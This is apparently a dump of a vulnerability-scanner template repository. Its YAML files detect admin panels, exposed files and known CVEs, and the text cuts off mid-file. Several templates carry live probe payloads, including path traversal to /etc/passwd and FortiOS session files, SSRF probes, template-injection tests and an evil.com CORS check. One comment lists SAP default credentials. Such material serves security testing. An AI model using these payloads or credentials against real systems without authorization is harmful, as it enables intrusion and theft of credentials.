├── .gitignore ├── payloads └── CVE-2020-6287.xml ├── .yamllint ├── panels ├── crxde.yaml ├── jmx-console.yaml ├── rabbitmq-dashboard.yaml ├── grafana-detect.yaml ├── mongo-express-web-gui.yaml ├── compal.yaml ├── supervpn-panel.yaml ├── fortinet-fortigate-panel.yaml ├── cisco-asa-panel.yaml ├── globalprotect-panel.yaml ├── parallels-html-client.yaml ├── jenkins-asyncpeople.yaml ├── kubernetes-pods.yaml ├── sap-netweaver-detect.yaml ├── weave-scope-dashboard-detect.yaml ├── tikiwiki-cms.yaml ├── atlassian-crowd-panel.yaml ├── citrix-adc-gateway-detect.yaml ├── pulse-secure-panel.yaml ├── docker-api.yaml ├── sophos-fw-version-detect.yaml ├── phpmyadmin-panel.yaml ├── webeditors.yaml ├── sap-recon-detect.yaml └── swagger-panel.yaml ├── .pre-commit-config.yaml ├── files ├── wp-xmlrpc.yaml ├── debug-pprof.yaml ├── dir-listing.yaml ├── git-config.yaml ├── jkstatus-manager.yaml ├── drupal-install.yaml ├── htaccess-config.yaml ├── lazy-file.yaml ├── telerik-fileupload-detect.yaml ├── laravel-env.yaml ├── firebase-detect.yaml ├── wordpress-user-enumeration.yaml ├── tomcat-scripts.yaml ├── wordpress-directory-listing.yaml ├── web-config.yaml ├── public-tomcat-instance.yaml ├── apc-info.yaml ├── cgi-test-page.yaml ├── docker-registry.yaml ├── elasticsearch.yaml ├── jolokia.yaml ├── security.txt.yaml ├── exposed-kibana.yaml ├── filezilla.yaml ├── exposed-svn.yaml ├── server-status-localhost.yaml ├── telerik-dialoghandler-detect.yaml ├── phpinfo.yaml ├── wadl-files.yaml └── zip-backup-files.yaml ├── technologies ├── sap-netweaver-detect.yaml ├── citrix-vpn-detect.yaml ├── github-enterprise-detect.yaml ├── home-assistant.yaml ├── s3-detect.yaml ├── sql-server-reporting.yaml ├── weblogic-detect.yaml ├── werkzeug-debugger-detect.yaml ├── jira-detect.yaml ├── gitlab-detect.yaml ├── jaspersoft-detect.yaml ├── couchdb-detect.yaml ├── sap-netweaver-as-java-detect.yaml ├── prometheus-exposed-panel.yaml ├── graphql.yaml ├── clockwork-php-page.yaml ├── netsweeper-webadmin-detect.yaml ├── liferay-portal-detect.yaml ├── bigip-config-utility-detect.yaml ├── linkerd-badrule-detect.yaml ├── ntlm-directories.yaml └── linkerd-ssrf-detect.yaml ├── cves ├── CVE-2019-19781.yaml ├── CVE-2018-13379.yaml ├── CVE-2018-16341.yaml ├── CVE-2017-9506.yaml ├── CVE-2018-14728.yaml ├── CVE-2018-3760.yaml ├── CVE-2018-3714.yaml ├── CVE-2019-18394.yaml ├── CVE-2018-7490.yaml ├── CVE-2019-12314.yaml ├── CVE-2020-2096.yaml ├── CVE-2020-5284.yaml ├── CVE-2018-18069.yaml ├── CVE-2019-19368.yaml ├── CVE-2019-8982.yaml ├── CVE-2018-2791.yaml ├── CVE-2019-3799.yaml ├── CVE-2019-19908.yaml ├── CVE-2019-8903.yaml ├── CVE-2018-11759.yaml ├── CVE-2018-5230.yaml ├── CVE-2019-17382.yaml ├── CVE-2020-3187.yaml ├── CVE-2020-3452.yaml ├── CVE-2020-8115.yaml ├── CVE-2019-19719.yaml ├── CVE-2019-5418.yaml ├── CVE-2018-20824.yaml ├── CVE-2019-14974.yaml ├── CVE-2020-5405.yaml ├── CVE-2018-19439.yaml ├── CVE-2018-1247.yaml ├── CVE-2019-8449.yaml ├── CVE-2020-8091.yaml ├── CVE-2018-11409.yaml ├── CVE-2019-9978.yaml ├── CVE-2020-8982.yaml ├── CVE-2019-11510.yaml ├── CVE-2019-14322.yaml ├── CVE-2018-1000129.yaml ├── CVE-2020-9484.yaml ├── CVE-2020-9757.yaml ├── CVE-2019-19985.yaml ├── CVE-2020-5410.yaml ├── CVE-2019-16759-1.yaml ├── CVE-2019-16278.yaml ├── CVE-2020-8512.yaml ├── CVE-2019-16759.yaml ├── CVE-2019-15043.yaml ├── CVE-2018-0296.yaml ├── CVE-2019-2588.yaml ├── CVE-2018-1271.yaml ├── CVE-2020-10204.yaml ├── CVE-2020-10199.yaml ├── CVE-2017-7529.yaml ├── CVE-2019-3396.yaml ├── CVE-2020-7209.yaml ├── CVE-2020-8194.yaml ├── CVE-2019-20354.yaml ├── CVE-2020-8191.yaml ├── CVE-2020-12720.yaml ├── CVE-2020-1147.yaml ├── CVE-2017-10075.yaml ├── CVE-2017-9841.yaml ├── CVE-2019-10475.yaml ├── CVE-2020-6287.yaml ├── CVE-2019-19743.yaml ├── CVE-2019-8451.yaml ├── CVE-2020-13167.yaml ├── CVE-2020-5902.yaml ├── CVE-2020-8193.yaml └── CVE-2020-7961.yaml ├── workflows ├── liferay-rce-workflow.yaml ├── bigip-pwner-workflow.yaml ├── rabbitmq-workflow.yaml ├── sap-netweaver-workflow.yaml ├── netsweeper-preauth-rce-workflow.yaml ├── vbulletin-workflow.yaml ├── springboot-pwner-workflow.yaml ├── wordpress-workflow.yaml └── jira-exploitaiton-workflow.yaml ├── vulnerabilities ├── twig-php-ssti.yaml ├── wordpress-duplicator-path-traversal.yaml ├── oracle-ebs-bispgraph-file-access.yaml ├── rce-shellshock-user-agent.yaml ├── wordpress-wordfence-xss.yaml ├── moodle-filter-jmol-xss.yaml ├── discourse-xss.yaml ├── eclipse-xss.yaml ├── moodle-filter-jmol-lfi.yaml ├── nginx-module-vts-xss.yaml ├── wems-enterprise-xss.yaml ├── x-forwarded-host-injection.yaml ├── cached-aem-pages.yaml ├── ibm-infoprint-directory-traversal.yaml ├── pdf-signer-ssti-to-rce.yaml ├── sick-beard-xss.yaml ├── symfony-debugmode.yaml ├── tikiwiki-reflected-xss.yaml ├── tomcat-manager-pathnormalization.yaml ├── couchdb-adminparty.yaml ├── rce-via-java-deserialization.yaml ├── nscript-web-studios-xss.yaml ├── ssti-jinja2.yaml ├── git-config-nginxoffbyslash.yaml ├── springboot-actuators-jolokia-xxe.yaml ├── microstrategy-ssrf.yaml ├── sql-injection.yaml ├── command-injection.yaml ├── weblogic-servlet-xss.yml ├── open-redirect.yaml ├── local-file-inclusion.yaml └── crlf-injection.yaml ├── dns ├── servfail-refused-hosts.yaml ├── dead-host-with-cname.yaml ├── cname-service-detector.yaml └── azure-takeover-detection.yaml ├── security-misconfiguration ├── jira-unauthenticated-user-picker.yaml ├── basic-cors-flash.yaml ├── basic-cors.yaml ├── jira-unauthenticated-projects.yaml ├── rack-mini-profiler.yaml ├── front-page-misconfig.yaml ├── wamp-xdebug-detect.yaml ├── jira-service-desk-signup.yaml ├── rabbitmq-default-admin.yaml ├── wordpress-accessible-wpconfig.yaml ├── jira-unauthenticated-popular-filters.yaml ├── jira-unauthenticated-dashboards.yaml └── springboot-detect.yaml ├── .github └── workflows │ └── syntax-checking.yml ├── basic-detections ├── basic-xss-prober.yaml └── general-tokens.yaml ├── tokens ├── google-api-key.yaml ├── mailchimp-api-key.yaml ├── aws-access-key-value.yaml ├── amazon-mws-auth-token-value.yaml ├── http-username-password.yaml └── slack-access-token.yaml ├── subdomain-takeover ├── s3-subtakeover.yaml └── detect-all-takeovers.yaml ├── LICENSE ├── brute-force └── tomcat-manager-bruteforce.yaml └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | local/ 3 | -------------------------------------------------------------------------------- /payloads/CVE-2020-6287.xml: -------------------------------------------------------------------------------- 1 | javaprojectdiscoverproj3ctD1$c0v3ry -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | rules: 5 | document-start: disable 6 | line-length: disable 7 | new-lines: disable 8 | new-line-at-end-of-file: disable 9 | truthy: disable 10 | -------------------------------------------------------------------------------- /panels/crxde.yaml: -------------------------------------------------------------------------------- 1 | id: crxde 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crx/de/index.jsp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "CRXDE Lite" 16 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: end-of-file-fixer 6 | - id: trailing-whitespace 7 | - repo: https://github.com/adrienverge/yamllint.git 8 | rev: v1.17.0 9 | hooks: 10 | - id: yamllint 11 | -------------------------------------------------------------------------------- /files/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/xmlrpc.php" 12 | matchers: 13 | - type: status 14 | status: 15 | - 405 16 | -------------------------------------------------------------------------------- /files/debug-pprof.yaml: -------------------------------------------------------------------------------- 1 | id: debug-pprof 2 | 3 | info: 4 | name: pprof debug file 5 | author: pdteam 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/debug/pprof/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Types of profiles available" 16 | -------------------------------------------------------------------------------- /panels/jmx-console.yaml: -------------------------------------------------------------------------------- 1 | id: jmx-console 2 | info: 3 | name: JMX Console 4 | author: Yash Anand @yashanand155 5 | severity: Low 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/jmx-console/' 10 | matchers: 11 | - type: word 12 | words: 13 | - JBoss JMX Management Console 14 | -------------------------------------------------------------------------------- /technologies/sap-netweaver-detect.yaml: -------------------------------------------------------------------------------- 1 | id: SAP-Netweaver-Detect 2 | info: 3 | name: SAP NetWeaver Detect 4 | author: rakeshmane10 5 | severity: info 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/irj/portal' 10 | matchers: 11 | - type: word 12 | words: 13 | - NetWeaver 14 | -------------------------------------------------------------------------------- /cves/CVE-2019-19781.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19781 2 | 3 | info: 4 | name: Citrix ADC Directory Traversal 5 | author: organiccrap 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" 12 | matchers: 13 | - type: word 14 | words: 15 | - "[global]" 16 | -------------------------------------------------------------------------------- /panels/rabbitmq-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-dashboard 2 | 3 | info: 4 | name: RabbitMQ Dashboard 5 | author: fyoorer 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}' 12 | matchers: 13 | - type: word 14 | words: 15 | - "RabbitMQ Management" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/dir-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dir-listing 2 | 3 | info: 4 | name: Directory listing enabled 5 | author: _harleo 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Index of /" 16 | - "[To Parent Directory]" 17 | -------------------------------------------------------------------------------- /panels/grafana-detect.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-detect 2 | 3 | info: 4 | name: Grafana panel detect 5 | author: organiccrap 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Grafana" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/citrix-vpn-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-vpn-detect 2 | 3 | info: 4 | name: Citrix VPN Detection 5 | author: bauthard 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/index.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Citrix Gateway" 16 | -------------------------------------------------------------------------------- /technologies/github-enterprise-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Github-Enterprise-Detect 2 | 3 | info: 4 | name: Detect Github Enterprise 5 | author: ehsahil 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GitHub · Enterprise" 16 | -------------------------------------------------------------------------------- /workflows/liferay-rce-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: liferay-rce-workflow 2 | 3 | info: 4 | name: Liferay RCE Workflow 5 | author: dwisiswant0 6 | 7 | variables: 8 | liferay_portal: technologies/liferay-portal-detect.yaml 9 | liferay_portal_cve: cves/CVE-2020-7961.yaml 10 | 11 | logic: 12 | | 13 | if liferay_portal() { 14 | liferay_portal_cve() 15 | } 16 | -------------------------------------------------------------------------------- /technologies/home-assistant.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant 2 | 3 | info: 4 | name: Detect Home Assistant 5 | author: fabaff 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:8123/" 12 | - "{{BaseURL}}/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Home Assistant" 17 | -------------------------------------------------------------------------------- /panels/mongo-express-web-gui.yaml: -------------------------------------------------------------------------------- 1 | id: mongo-express-web-gui 2 | 3 | info: 4 | name: Mongo Express Web GUI 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Set-Cookie: mongo-express=" 16 | part: header 17 | -------------------------------------------------------------------------------- /technologies/s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/%c0" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/compal.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/common_page/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/admin/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Sign In-SuperVPN" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/fortinet-fortigate-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fortinet-fortigate-panel 2 | 3 | info: 4 | name: Fortinet FortiGate SSL VPN Panel 5 | author: bsysop 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/remote/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "/remote/fgt_lang" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/sql-server-reporting.yaml: -------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Report Manager" 16 | -------------------------------------------------------------------------------- /workflows/bigip-pwner-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bigip-pwner-workflow 2 | 3 | info: 4 | name: F5 BIG-IP RCE Workflow 5 | author: dwisiswant0 6 | 7 | variables: 8 | bigip_config_utility: technologies/bigip-config-utility-detect.yaml 9 | bigip_cve_2020_5902: cves/CVE-2020-5902.yaml 10 | 11 | logic: 12 | | 13 | if bigip_config_utility() { 14 | bigip_cve_2020_5902() 15 | } 16 | -------------------------------------------------------------------------------- /files/git-config.yaml: -------------------------------------------------------------------------------- 1 | id: git-config 2 | 3 | info: 4 | name: Git Config Disclosure 5 | author: Ice3man 6 | severity: medium 7 | description: Searches for the pattern /.git/config on passed URLs. 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.git/config" 13 | matchers: 14 | - type: word 15 | words: 16 | - "[core]" 17 | -------------------------------------------------------------------------------- /vulnerabilities/twig-php-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: twig-php-ssti 2 | 3 | info: 4 | name: Twig PHP <2.4.4 template engine - SSTI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/search?search_key={{1337*1338}}" 12 | matchers: 13 | - type: word 14 | words: 15 | - "1788906" 16 | part: body 17 | -------------------------------------------------------------------------------- /workflows/rabbitmq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-workflow 2 | 3 | info: 4 | name: RabbitMQ Workflow 5 | author: fyoorer 6 | 7 | variables: 8 | rabbitmq_dashboard: panels/rabbitmq-dashboard.yaml 9 | rabbitmq_default_admin: security-misconfiguration/rabbitmq-default-admin.yaml 10 | 11 | logic: 12 | | 13 | if rabbitmq_dashboard() { 14 | rabbitmq_default_admin() 15 | } 16 | -------------------------------------------------------------------------------- /dns/servfail-refused-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: servfail-refused-hosts 2 | 3 | info: 4 | name: Servfail Host Finder 5 | author: mzack9999 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "SERVFAIL" 18 | - "REFUSED" 19 | -------------------------------------------------------------------------------- /panels/cisco-asa-panel.yaml: -------------------------------------------------------------------------------- 1 | id: cisco-asa-panel-detect 2 | 3 | info: 4 | name: Cisco ASA VPN panel detect 5 | author: organiccrap 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/+CSCOE+/logon.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "SSL VPN Service" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/globalprotect-panel.yaml: -------------------------------------------------------------------------------- 1 | id: globalprotect-panel 2 | 3 | info: 4 | name: PaloAlto Networks GlobalProtect Panel 5 | author: organiccrap 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/global-protect/login.esp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GlobalProtect Portal" 16 | -------------------------------------------------------------------------------- /cves/CVE-2018-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-13379 2 | 3 | info: 4 | name: FortiOS - Credentials Disclosure 5 | author: organiccrap 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 12 | matchers: 13 | - type: word 14 | words: 15 | - "var fgt_lang =" 16 | -------------------------------------------------------------------------------- /panels/parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: bauthard 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/RASHTML5Gateway/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Parallels HTML5 Client" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/weblogic-detect.yaml: -------------------------------------------------------------------------------- 1 | id: WebLogic-Detect 2 | 3 | info: 4 | name: Detect Weblogic 5 | author: bing0o 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:7001/console/login/LoginForm.jsp" 12 | - "{{BaseURL}}/console/login/LoginForm.jsp" 13 | matchers: 14 | - type: word 15 | words: 16 | - "WebLogic" 17 | -------------------------------------------------------------------------------- /files/jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: bauthard 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | headers: 11 | X-Forwarded-For: "127.0.0.1" 12 | path: 13 | - "{{BaseURL}}/jkstatus/" 14 | matchers: 15 | - type: word 16 | words: 17 | - "JK Status Manager" 18 | -------------------------------------------------------------------------------- /panels/jenkins-asyncpeople.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-async-people 2 | 3 | info: 4 | name: Jenkins panel async-people 5 | author: nadino 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/asynchPeople/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "People - [Jenkins]" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" 12 | matchers: 13 | - type: word 14 | words: 15 | - "31333333337" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/drupal-install.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-install 2 | 3 | info: 4 | name: Drupal Install 5 | author: NkxxkN 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/install.php?profile=default" 12 | redirects: true 13 | max-redirects: 1 14 | matchers: 15 | - type: word 16 | words: 17 | - "Choose language | Drupal" 18 | -------------------------------------------------------------------------------- /workflows/sap-netweaver-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-workflow 2 | 3 | info: 4 | name: SAP NetWaver Workflow 5 | author: dwisiswant0 6 | 7 | variables: 8 | sap_netweaver_as_java: technologies/sap-netweaver-as-java-detect.yaml 9 | sap_netweaver_as_java_cve_1: cves/CVE-2020-6287.yaml 10 | 11 | logic: 12 | | 13 | if sap_netweaver_as_java() { 14 | sap_netweaver_as_java_cve_1() 15 | } 16 | -------------------------------------------------------------------------------- /technologies/werkzeug-debugger-detect.yaml: -------------------------------------------------------------------------------- 1 | id: werkzeug-debugger-detect 2 | 3 | info: 4 | name: Werkzeug debugger console 5 | author: pdnuclei - projectdiscovery.io 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/console" 12 | matchers: 13 | - type: word 14 | words: 15 | - "

Interactive Console

" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2017-9506.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-9506 2 | 3 | info: 4 | name: Jira IconURIServlet SSRF 5 | author: Ice3man 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json" 12 | matchers: 13 | - type: word 14 | words: 15 | - "ipinfo.io/missingauth" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/htaccess-config.yaml: -------------------------------------------------------------------------------- 1 | id: htaccess-config 2 | 3 | info: 4 | name: HTaccess config file 5 | author: Yash Anand @yashanand155 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.htaccess" 12 | matchers: 13 | - type: word 14 | words: 15 | - RewriteRule 16 | - 17 | - " 19 | -------------------------------------------------------------------------------- /files/firebase-detect.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-detect 2 | 3 | info: 4 | name: firebase detect 5 | author: organiccrap 6 | severity: low 7 | # http://ghostlulz.com/google-exposed-firebase-database/ 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Could not parse auth token" 17 | part: body 18 | -------------------------------------------------------------------------------- /files/wordpress-user-enumeration.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-user-enumeration 2 | 3 | info: 4 | name: Wordpress user enumeration 5 | author: Manas_Harsh 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-json/wp/v2/users/" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - avatar_urls 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-3760.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-3760 2 | 3 | info: 4 | name: Rails cve-2018-3760 5 | author: 0xrudra 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: regex 18 | regex: 19 | - "root:[x*]:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /files/tomcat-scripts.yaml: -------------------------------------------------------------------------------- 1 | id: tomcat-scripts 2 | 3 | info: 4 | name: Detect Tomcat Exposed Scripts 5 | author: Co0nan 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/examples/servlets/index.html" 12 | - "{{BaseURL}}/examples/jsp/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "JSP Examples" 17 | - "JSP Samples" 18 | - "Servlets Examples" 19 | -------------------------------------------------------------------------------- /technologies/gitlab-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Gitlab-Detect 2 | 3 | info: 4 | name: Detect Gitlab 5 | author: ehsahil 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/users/sign_in" 12 | - "{{BaseURL}}/users/sign_up" 13 | - "{{BaseURL}}/explore" 14 | matchers: 15 | - type: word 16 | words: 17 | - "GitLab" 18 | - "Register for GitLab" 19 | - "Explore GitLab" 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-3714.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-3714 2 | info: 3 | name: node-srv Path Traversal 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/node_modules/../../../../../etc/passwd" 11 | matchers-condition: and 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /cves/CVE-2019-18394.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-18394 2 | 3 | info: 4 | name: Openfire Full Read SSRF 5 | author: pdteam - nuclei.projectdiscovery.io 6 | severity: critical 7 | 8 | # Source:- https://swarm.ptsecurity.com/openfire-admin-console/ 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/getFavicon?host=burpcollaborator.net" 14 | matchers: 15 | - type: word 16 | words: 17 | -

Burp Collaborator Server

-------------------------------------------------------------------------------- /security-misconfiguration/basic-cors.yaml: -------------------------------------------------------------------------------- 1 | id: basic-cors-misconfig 2 | 3 | info: 4 | name: Basic CORS misconfiguration 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | headers: 13 | Origin: "https://evil.com" 14 | matchers: 15 | - type: word 16 | words: 17 | - "Access-Control-Allow-Origin: https://evil.com" 18 | part: header 19 | -------------------------------------------------------------------------------- /vulnerabilities/wordpress-duplicator-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-duplicator-path-traversal 2 | 3 | info: 4 | name: WordPress duplicator Path Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php" 12 | matchers: 13 | - type: word 14 | words: 15 | - "DB_NAME" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/wordpress-directory-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-directory-listing 2 | 3 | info: 4 | name: Wordpress directory listing 5 | author: Manas_Harsh 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-content/uploads/" 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - Index of /wp-content/uploads 20 | -------------------------------------------------------------------------------- /panels/kubernetes-pods.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-pods-api 2 | info: 3 | name: Kubernetes Pods API 4 | author: ilovebinbash 5 | severity: info 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}:10250/pods' 10 | matchers-condition: and 11 | matchers: 12 | - type: word 13 | words: 14 | - "apiVersion" 15 | part: body 16 | - type: word 17 | words: 18 | - "application/json" 19 | part: header 20 | -------------------------------------------------------------------------------- /panels/sap-netweaver-detect.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-portal-detect 2 | 3 | info: 4 | name: SAP NetWeaver Portal detect 5 | author: organiccrap 6 | severity: info 7 | # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/irj/portal" 13 | matchers: 14 | - type: word 15 | words: 16 | - "SAP NetWeaver Portal" 17 | part: body 18 | -------------------------------------------------------------------------------- /vulnerabilities/oracle-ebs-bispgraph-file-access.yaml: -------------------------------------------------------------------------------- 1 | id: 